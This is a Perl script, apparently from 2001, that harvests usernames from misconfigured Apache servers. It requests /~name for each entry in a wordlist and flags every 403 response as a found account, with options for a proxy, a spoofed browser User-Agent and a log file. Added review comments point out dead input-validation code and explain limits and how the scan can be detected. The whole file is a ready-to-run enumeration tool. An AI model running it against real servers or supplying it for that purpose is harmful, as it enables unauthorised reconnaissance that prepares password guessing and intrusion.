#!/usr/bin/perl
#
#
# @2001M.eiszner mei@websec.org
# harvests users from badly configured
# apache server by requesting /~[username]
#
# if server responds Forbidden => user exists
# if server responds Not Found => NOT
#
########################################
use strict;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
## get options
##
# Package globals that getopts() fills in; every switch (-h -u -m -p -l)
# takes a value.
our ($opt_h, $opt_u, $opt_m, $opt_p, $opt_l);
getopts('h:u:m:p:l:');
## vardecs
##
my $host     = $opt_h;                       # -h: target host (required)
my $userfile = $opt_u;                       # -u: file with one username per line (required)
my $method   = $opt_m ? $opt_m : "HEAD";     # -m: HTTP method, HEAD unless given
my $proxy    = $opt_p;                       # -p: optional proxy server
my $logfile  = $opt_l;                       # -l: optional result file
my $url      = "";
## check that
##
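# Both -h and -u are mandatory; without them print the usage text and
# leave with exit status 11. The text lists every switch the script
# parses, including -l, which the earlier usage message omitted.
unless ($host && $userfile)
{
    print "\nusage: $0 -h [host]\n\t-u [usernameFile]";
    print "\n\t-m [method (default=HEAD)]\n\t-p [proxyServer]";
    print "\n\t-l [logFile]\n\n";
    exit 11;
}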
## input validation
##
# Prefix a scheme when the value carries neither http:// nor https://
# (matched case-insensitively, anywhere in the string), then drop any
# CR/LF characters.
# NOTE(review): $url is still the empty string here, and the user loop
# further down declares its own $url built from $host, so nothing computed
# in this block reaches a request. It looks as if $host was the intended
# subject -- confirm before relying on this as input validation.
unless ($url =~ m{https?://}i)
{
    $url = "http://" . $url;
}
$url =~ tr/\n\r//d;
## create user-agent
##
# Most recent HTTP::Response; assigned inside the user loop.
my $response;
# A single client object is reused for every request. It sends a fixed
# browser-style User-Agent header rather than the LWP default.
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");
# Route http requests through the proxy only when -p supplied one.
if (defined $proxy && $proxy ne '')
{
    $ua->proxy('http', $proxy);
}
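## resultfile
# Warnings are switched on from here to the end of the file so undefined
# values and I/O problems are reported instead of passing silently.
use warnings;

# Optional result log, opened only when -l was given. The three-argument
# open with a lexical handle uses the operator-supplied name literally; the
# earlier "> $logfile" form let characters in the name change the open mode.
my $log_fh;
if (defined $logfile && $logfile ne '')
{
    open($log_fh, '>', $logfile) or die "cant open $logfile: $!\n";
    print {$log_fh} "host: $host\n\n";
}

## userloop
# One request per line of the username file, using the method chosen with -m.
#
# Reading the result: the script treats a 403 on /~name as "account exists"
# and prints any other status code as-is.
# NOTE(review): a 403 can have other causes (access rules, filters), so a hit
# is an indication, not proof.
# The signal exists only where per-user directories are mapped and present
# and absent accounts answer differently; "UserDir disabled", or identical
# answers for both cases, removes it, and a run of /~name requests from one
# client stands out in the access log.
open(my $user_fh, '<', $userfile) or die "cant open $userfile: $!\n";
while (my $line = <$user_fh>)
{
    ## username
    ##
    (my $uid = $line) =~ s/[\n\r]//g;
    next if $uid eq '';    # blank lines carry no username

    ## url
    ##
    my $url = $host . "/~" . $uid;
    my $request = HTTP::Request->new($method, $url);
    $response = $ua->request($request);
    my $code = $response->code();

    # Status codes are numbers, so compare numerically.
    my $report = ($code == 403)
        ? "$uid *** USERNAME FOUND ***\n"
        : "$uid $code\n";

    print $report;
    print {$log_fh} $report if $log_fh;
} # enduserloop
close($user_fh);

# Buffered write errors only surface at close, so check it for the log.
if ($log_fh)
{
    close($log_fh) or die "cant close $logfile: $!\n";
}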